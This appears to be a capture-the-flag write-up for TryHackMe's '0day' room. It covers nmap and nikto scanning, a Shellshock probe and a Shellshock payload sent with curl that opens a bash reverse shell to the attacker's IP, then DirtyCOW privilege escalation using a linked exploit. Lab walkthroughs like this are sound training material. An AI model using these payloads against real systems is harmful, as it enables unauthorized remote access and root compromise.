0DAY-TRYHACKME

This is the write-up for room named 0day on TryHackMe.

The room can be found here :- https://tryhackme.com/room/0day

Details given:

Exploit Ubuntu, like a Turtle in a Hurricane. Root my secure Website, take a step into the history of hacking.

What is required?:

user.txt and root.txt

Enumeration

NMAP:

As always lets start scanning the target with the IP given:

nmap -sC -sV 10.10.119.34

We have port 22-SSH and port 80-Web open with the above versions. Let enumerate further port 80 using Nikto.

NIKTO:

nikto -h 10.10.119.34

The above nikto scan reveals that this box is vulnerable to Shellshock. This is a very famous bug in bash and according to Wikipedia(https://en.wikipedia.org/wiki/Shellshock_(software_bug)):

Shellshock, also known as Bashdoor,is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. Nikto scan also revealed few interesting web directories like /admin,/backup and /secret. Lets keep that in mind and if required we can come back to these directories later for further enumeration.

We can use cURL and try to enumerate further and test if we are actually vulnerable to Shellshock.

SHELLSHOCK:

curl http://10.10.119.34/cgi-bin/test.cgi -H “Referer: () { test;}; echo ‘Content-Type: text/plain’; echo; echo; /usr/bin/id; exit”

This outputs www-data as the user confirming it is exploitable using Shellshock.

Exploit

SHELLSHOCK:

Lets exploit Shellshock and gets a reverse shell using the following command:

curl -v http://10.10.119.34/cgi-bin/test.cgi -H “Referer: () { test;}; echo ‘Content-Type: text/plain’; echo; echo; /bin/bash -i >& /dev/tcp/10.8.98.192/9999 0>&1”

We get our reverse shell and thus our user flag in ryan’s home directory :- THM{Sh********_*****}

Privilege Escalation

DIRTY COW:

Use Linux Exploit Suggester from https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh which suggest that the box is vulnerable to dirtyc0w vulnerability.

Again this a very famous vulnerability and read more details about it here:- https://dirtycow.ninja/

This can be used to do privilege escalation and a working exploit is available here which worked for this box: https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679

Target is a x64 machine and we faced problems in compiling the exploit on the target.

www-data@ubuntu:/tmp cat /proc/version
cat /proc/version
Linux version 3.13.0–32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2–19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014

So compile the exploit locally on kali and transfer it to the target.

┌──(kali㉿kali)-[/opt/tools/exploits]
└─$ gcc cowroot.c -o cowroot -pthread

Running ./cowroot on target gives us root shell and the root flag in /root :- THM{g00d********************}

Originally published at https://basicpentesting.blogspot.com on October 22, 2020.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Balancing governance, risk, and compliance

Vantage Point audits Folks Finance

What Covid-19 Means for eCommerce Security

Vulnerable Devices & Data Threats

{UPDATE} Suntop Games Hack Free Resources Generator

Ledger Nano S: Review And Comparison

Your data security is the priority of MEMO

potential windows update database error detected

potential windows update database error detected

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

CVE-2021–44098

youtube-dl manual, yt-dlp manual

Vertical and horizontal expansion as a tool in roleplaying games

Pritunl and Pritunl Link Release Announcement